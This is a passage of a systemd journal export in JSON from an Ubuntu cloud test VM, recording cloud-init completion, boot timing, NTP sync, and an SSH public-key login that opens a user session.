"__REALTIME_TIMESTAMP" : "1615280822669516", "__MONOTONIC_TIMESTAMP" : "48386405", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "1", "_COMM" : "logger", "_EXE" : "/usr/bin/logger", "SYSLOG_IDENTIFIER" : "ec2", "_PID" : "1044", "_CMDLINE" : "logger -p user info -t ec2 -s", "_SYSTEMD_CGROUP" : "/system.slice/cloud-final.service", "_SYSTEMD_UNIT" : "cloud-final.service", "_SYSTEMD_INVOCATION_ID" : "d0aa2ce27cd0496fa1143bc5bdbebf5f", "MESSAGE" : "2048 SHA256:yknRoTzFSZARXtHupUbaRHJq3cqluJqyPejk+7QaGXg root@test-1 (RSA)", "_SOURCE_REALTIME_TIMESTAMP" : "1615280822669509" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=358;b=e2b08827b5804427b422c10c84f1567e;m=2e252a5;t=5bd16dfa5d20c;x=5f885475c0d1e4b3", "__REALTIME_TIMESTAMP" : "1615280822669836", "__MONOTONIC_TIMESTAMP" : "48386725", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "1", "_COMM" : "logger", "_EXE" : "/usr/bin/logger", "SYSLOG_IDENTIFIER" : "ec2", "_PID" : "1044", "_CMDLINE" : "logger -p user info -t ec2 -s", "_SYSTEMD_CGROUP" : "/system.slice/cloud-final.service", "_SYSTEMD_UNIT" : "cloud-final.service", "_SYSTEMD_INVOCATION_ID" : "d0aa2ce27cd0496fa1143bc5bdbebf5f", "MESSAGE" : "-----END SSH HOST KEY FINGERPRINTS-----", "_SOURCE_REALTIME_TIMESTAMP" : "1615280822669830" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=359;b=e2b08827b5804427b422c10c84f1567e;m=2e25352;t=5bd16dfa5d2ba;x=26ee703de244bf9c", "__REALTIME_TIMESTAMP" : "1615280822670010", "__MONOTONIC_TIMESTAMP" : "48386898", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "1", "_COMM" : "logger", "_EXE" : "/usr/bin/logger", "SYSLOG_IDENTIFIER" : "ec2", "_PID" : "1044", "_CMDLINE" : "logger -p user info -t ec2 -s", "_SYSTEMD_CGROUP" : "/system.slice/cloud-final.service", "_SYSTEMD_UNIT" : "cloud-final.service", "_SYSTEMD_INVOCATION_ID" : "d0aa2ce27cd0496fa1143bc5bdbebf5f", "MESSAGE" : "#############################################################", "_SOURCE_REALTIME_TIMESTAMP" : "1615280822670004" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=35a;b=e2b08827b5804427b422c10c84f1567e;m=2e36e2c;t=5bd16dfa6ed93;x=35f1f96d30effd5a", "__REALTIME_TIMESTAMP" : "1615280822742419", "__MONOTONIC_TIMESTAMP" : "48459308", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-final.service", "_SYSTEMD_UNIT" : "cloud-final.service", "_SYSTEMD_INVOCATION_ID" : "d0aa2ce27cd0496fa1143bc5bdbebf5f", "_STREAM_ID" : "ead4da9ee39d4fce8a904628ddd9478a", "MESSAGE" : "Cloud-init v. 19.1-1-gbaa47854-0ubuntu1~18.04.1 running 'modules:final' at Tue, 09 Mar 2021 09:07:02 +0000. Up 48.19 seconds.", "_PID" : "1010", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init modules --mode=final" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=35b;b=e2b08827b5804427b422c10c84f1567e;m=2e36e2c;t=5bd16dfa6ed93;x=f45d078408a62683", "__REALTIME_TIMESTAMP" : "1615280822742419", "__MONOTONIC_TIMESTAMP" : "48459308", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-final.service", "_SYSTEMD_UNIT" : "cloud-final.service", "_SYSTEMD_INVOCATION_ID" : "d0aa2ce27cd0496fa1143bc5bdbebf5f", "_STREAM_ID" : "ead4da9ee39d4fce8a904628ddd9478a", "_PID" : "1010", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init modules 
--mode=final", "MESSAGE" : "Cloud-init v. 19.1-1-gbaa47854-0ubuntu1~18.04.1 finished at Tue, 09 Mar 2021 09:07:02 +0000. Datasource DataSourceOpenStackLocal [net,ver=2]. Up 48.44 seconds" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=35c;b=e2b08827b5804427b422c10c84f1567e;m=2e469e2;t=5bd16dfa7e94a;x=9a8a1f311ad6278b", "__REALTIME_TIMESTAMP" : "1615280822806858", "__MONOTONIC_TIMESTAMP" : "48523746", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "cloud-final.service", "INVOCATION_ID" : "d0aa2ce27cd0496fa1143bc5bdbebf5f", "MESSAGE" : "Started Execute cloud user/final scripts.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280822804000" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=35d;b=e2b08827b5804427b422c10c84f1567e;m=2e476be;t=5bd16dfa7f626;x=3d51e90cf87306f1", "__REALTIME_TIMESTAMP" : "1615280822810150", "__MONOTONIC_TIMESTAMP" : "48527038", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : 
"init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Cloud-init target.", "UNIT" : "cloud-init.target", "INVOCATION_ID" : "12b2c5a5c7674278a29d76d29ab052c1", "_SOURCE_REALTIME_TIMESTAMP" : "1615280822807544" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=35e;b=e2b08827b5804427b422c10c84f1567e;m=2e4f15a;t=5bd16dfa870c1;x=ef22149adcde0829", "__REALTIME_TIMESTAMP" : "1615280822841537", "__MONOTONIC_TIMESTAMP" : "48558426", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "CODE_FILE" : "../src/core/manager.c", "CODE_LINE" : "3260", "CODE_FUNC" : "manager_notify_finished", "MESSAGE_ID" : "b07a249cd024414a82dd00cd181378ff", "KERNEL_USEC" : "4655018", "USERSPACE_USEC" : "43903173", "MESSAGE" : "Startup finished in 4.655s (kernel) + 43.903s (userspace) = 48.558s.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280822841333" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=35f;b=e2b08827b5804427b422c10c84f1567e;m=2fcba4f;t=5bd16dfc039b5;x=8ce63cc3a6a6ddf3", "__REALTIME_TIMESTAMP" : "1615280824400309", "__MONOTONIC_TIMESTAMP" : "50117199", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", 
"_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "ac6fa69968fd467a979ed2236d40a21a", "SYSLOG_IDENTIFIER" : "snapd", "_PID" : "817", "_COMM" : "snapd", "_EXE" : "/usr/lib/snapd/snapd", "_CMDLINE" : "/usr/lib/snapd/snapd", "_SYSTEMD_CGROUP" : "/system.slice/snapd.service", "_SYSTEMD_UNIT" : "snapd.service", "_SYSTEMD_INVOCATION_ID" : "7ffc7748c7334851b33f278a253dc6d2", "MESSAGE" : "daemon.go:576: gracefully waiting for running hooks" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=360;b=e2b08827b5804427b422c10c84f1567e;m=2fcba4f;t=5bd16dfc039b5;x=f865ce5bd4cbe418", "__REALTIME_TIMESTAMP" : "1615280824400309", "__MONOTONIC_TIMESTAMP" : "50117199", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "ac6fa69968fd467a979ed2236d40a21a", "SYSLOG_IDENTIFIER" : "snapd", "_PID" : "817", "_COMM" : "snapd", "_EXE" : "/usr/lib/snapd/snapd", "_CMDLINE" : "/usr/lib/snapd/snapd", "_SYSTEMD_CGROUP" : "/system.slice/snapd.service", "_SYSTEMD_UNIT" : "snapd.service", "_SYSTEMD_INVOCATION_ID" : "7ffc7748c7334851b33f278a253dc6d2", "MESSAGE" : "daemon.go:578: done waiting for running hooks" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=361;b=e2b08827b5804427b422c10c84f1567e;m=2fcc249;t=5bd16dfc041b0;x=f81c02bb69040e23", "__REALTIME_TIMESTAMP" : "1615280824402352", "__MONOTONIC_TIMESTAMP" : "50119241", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : 
"ac6fa69968fd467a979ed2236d40a21a", "SYSLOG_IDENTIFIER" : "snapd", "_PID" : "817", "_COMM" : "snapd", "_EXE" : "/usr/lib/snapd/snapd", "_CMDLINE" : "/usr/lib/snapd/snapd", "_SYSTEMD_CGROUP" : "/system.slice/snapd.service", "_SYSTEMD_UNIT" : "snapd.service", "_SYSTEMD_INVOCATION_ID" : "7ffc7748c7334851b33f278a253dc6d2", "MESSAGE" : "daemon stop requested to wait for socket activation" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=362;b=e2b08827b5804427b422c10c84f1567e;m=4435c5d;t=5bd16e106dbc4;x=891668ccabf0551c", "__REALTIME_TIMESTAMP" : "1615280845806532", "__MONOTONIC_TIMESTAMP" : "71523421", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "9", "CODE_FILE" : "../src/timesync/timesyncd-manager.c", "SYSLOG_IDENTIFIER" : "systemd-timesyncd", "_PID" : "501", "_UID" : "62583", "_GID" : "62583", "_COMM" : "systemd-timesyn", "_EXE" : "/lib/systemd/systemd-timesyncd", "_CMDLINE" : "/lib/systemd/systemd-timesyncd", "_CAP_EFFECTIVE" : "2000000", "_SYSTEMD_CGROUP" : "/system.slice/systemd-timesyncd.service", "_SYSTEMD_UNIT" : "systemd-timesyncd.service", "_SYSTEMD_INVOCATION_ID" : "02dc978d5d9147908ffca7c0020b3270", "CODE_LINE" : "678", "CODE_FUNC" : "manager_receive_response", "MESSAGE" : "Synchronized to time server 91.189.89.199:123 (ntp.ubuntu.com).", "_SOURCE_REALTIME_TIMESTAMP" : "1615280845806492" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=363;b=e2b08827b5804427b422c10c84f1567e;m=9efca26;t=5bd16e6b34985;x=409f2dd401169ca7", "__REALTIME_TIMESTAMP" : "1615280940992901", "__MONOTONIC_TIMESTAMP" : "166709798", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" 
: "3fffffffff", "SYSLOG_FACILITY" : "4", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "sshd", "_COMM" : "sshd", "_EXE" : "/usr/sbin/sshd", "_SYSTEMD_CGROUP" : "/system.slice/ssh.service", "_SYSTEMD_UNIT" : "ssh.service", "_SYSTEMD_INVOCATION_ID" : "93b3a6735e0a4aa6b67f86bb4665a76e", "SYSLOG_PID" : "1092", "MESSAGE" : "Accepted publickey for ubuntu from 10.18.255.254 port 50031 ssh2: RSA SHA256:HORx/u4a1tHXBbnoTOF0nmyK3B5/06UnlHbNMExg8+g", "_PID" : "1092", "_CMDLINE" : "sshd: ubuntu [priv]", "_SOURCE_REALTIME_TIMESTAMP" : "1615280940992855" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=364;b=e2b08827b5804427b422c10c84f1567e;m=9efe4c3;t=5bd16e6b3642a;x=7334fd38c0f161a5", "__REALTIME_TIMESTAMP" : "1615280940999722", "__MONOTONIC_TIMESTAMP" : "166716611", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "sshd", "_COMM" : "sshd", "_EXE" : "/usr/sbin/sshd", "_SYSTEMD_CGROUP" : "/system.slice/ssh.service", "_SYSTEMD_UNIT" : "ssh.service", "_SYSTEMD_INVOCATION_ID" : "93b3a6735e0a4aa6b67f86bb4665a76e", "SYSLOG_PID" : "1092", "_PID" : "1092", "_CMDLINE" : "sshd: ubuntu [priv]", "MESSAGE" : "pam_unix(sshd:session): session opened for user ubuntu by (uid=0)", "_SOURCE_REALTIME_TIMESTAMP" : "1615280940999697" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=365;b=e2b08827b5804427b422c10c84f1567e;m=9f004cd;t=5bd16e6b38434;x=6c57a109f623e465", "__REALTIME_TIMESTAMP" : "1615280941007924", "__MONOTONIC_TIMESTAMP" : "166724813", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" 
: "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Created slice User Slice of ubuntu.", "UNIT" : "user-1000.slice", "INVOCATION_ID" : "6d2df251246544468f4d5b4b70d4730b", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941007835" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=366;b=e2b08827b5804427b422c10c84f1567e;m=9f04f2c;t=5bd16e6b3ce93;x=243bdea031327f14", "__REALTIME_TIMESTAMP" : "1615280941026963", "__MONOTONIC_TIMESTAMP" : "166743852", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting User Manager for UID 1000...", "UNIT" : "user@1000.service", "INVOCATION_ID" : "70ea038d911745e89e876eac8461b685", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941026951" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=367;b=e2b08827b5804427b422c10c84f1567e;m=9f088f5;t=5bd16e6b4085d;x=3242c936452d94ce", "__REALTIME_TIMESTAMP" : "1615280941041757", "__MONOTONIC_TIMESTAMP" : "166758645", 
"_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started Session 1 of user ubuntu.", "UNIT" : "session-1.scope", "INVOCATION_ID" : "2b1962eb80184110bd624cc00819ebf7", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941040021" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=368;b=e2b08827b5804427b422c10c84f1567e;m=9f0898e;t=5bd16e6b408f6;x=aced2a2b19bceba0", "__REALTIME_TIMESTAMP" : "1615280941041910", "__MONOTONIC_TIMESTAMP" : "166758798", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_EXE" : "/lib/systemd/systemd", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "10", "MESSAGE" : "pam_unix(systemd-user:session): session opened for user ubuntu by (uid=0)", "_PID" : "1103", "_COMM" : "(systemd)", "_CMDLINE" : "(systemd)", "_AUDIT_SESSION" : "2", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/user@1000.service", "_SYSTEMD_OWNER_UID" : "1000", "_SYSTEMD_UNIT" : "user@1000.service", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "_SYSTEMD_INVOCATION_ID" : "70ea038d911745e89e876eac8461b685", "_SOURCE_REALTIME_TIMESTAMP" : 
"1615280941040532" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=369;b=e2b08827b5804427b422c10c84f1567e;m=9f09ebd;t=5bd16e6b41e24;x=19c833f3edf7cc95", "__REALTIME_TIMESTAMP" : "1615280941047332", "__MONOTONIC_TIMESTAMP" : "166764221", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "SYSLOG_FACILITY" : "4", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-logind", "_PID" : "784", "_COMM" : "systemd-logind", "_EXE" : "/lib/systemd/systemd-logind", "_CMDLINE" : "/lib/systemd/systemd-logind", "_CAP_EFFECTIVE" : "24420002f", "_SYSTEMD_CGROUP" : "/system.slice/systemd-logind.service", "_SYSTEMD_UNIT" : "systemd-logind.service", "_SYSTEMD_INVOCATION_ID" : "92ace4bf8cc84ed790e29aea96b87129", "CODE_FILE" : "../src/login/logind-session.c", "CODE_LINE" : "633", "CODE_FUNC" : "session_start", "MESSAGE_ID" : "8d45620c1a4348dbb17410da57c60c66", "SESSION_ID" : "1", "USER_ID" : "ubuntu", "LEADER" : "1092", "MESSAGE" : "New session 1 of user ubuntu.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941042545" } { "__CURSOR" : "s=b561a865bb2f43f8b38c4b1fb9ac78ae;i=36a;b=e2b08827b5804427b422c10c84f1567e;m=9f360e2;t=5bd16e6b6e049;x=c762ed8af5f522cf", "__REALTIME_TIMESTAMP" : "1615280941228105", "__MONOTONIC_TIMESTAMP" : "166944994", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "SYSLOG_IDENTIFIER" : "systemd", "MESSAGE" : "Reached target Timers.", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "USER_UNIT" : "timers.target", "USER_INVOCATION_ID" : "c32bba9a46b6418a87022db13a18acc5", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_TRANSPORT" : "journal", "_PID" : "1103", "_UID" : "1000", "_GID" : "1000", "_COMM" : "systemd", "_EXE" : 
"/lib/systemd/systemd", "_CMDLINE" : "/lib/systemd/systemd --user", "_CAP_EFFECTIVE" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_AUDIT_SESSION" : "2", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/user@1000.service/init.scope", "_SYSTEMD_OWNER_UID" : "1000", "_SYSTEMD_UNIT" : "user@1000.service", "_SYSTEMD_USER_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "_SYSTEMD_INVOCATION_ID" : "70ea038d911745e89e876eac8461b685", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941228074", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "test-1" } { "__CURSOR" : "s=b561a865bb2f43f8b38c4b1fb9ac78ae;i=36b;b=e2b08827b5804427b422c10c84f1567e;m=9f39479;t=5bd16e6b713e1;x=867aa9f125e4a6b0", "__REALTIME_TIMESTAMP" : "1615280941241313", "__MONOTONIC_TIMESTAMP" : "166958201", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "SYSLOG_IDENTIFIER" : "systemd", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_TRANSPORT" : "journal", "_PID" : "1103", "_UID" : "1000", "_GID" : "1000", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/lib/systemd/systemd --user", "_CAP_EFFECTIVE" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_AUDIT_SESSION" : "2", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/user@1000.service/init.scope", "_SYSTEMD_OWNER_UID" : "1000", "_SYSTEMD_UNIT" : "user@1000.service", "_SYSTEMD_USER_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "_SYSTEMD_INVOCATION_ID" : "70ea038d911745e89e876eac8461b685", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "test-1", "MESSAGE" : "Listening on GnuPG cryptographic agent (ssh-agent emulation).", "USER_UNIT" : "gpg-agent-ssh.socket", "USER_INVOCATION_ID" : 
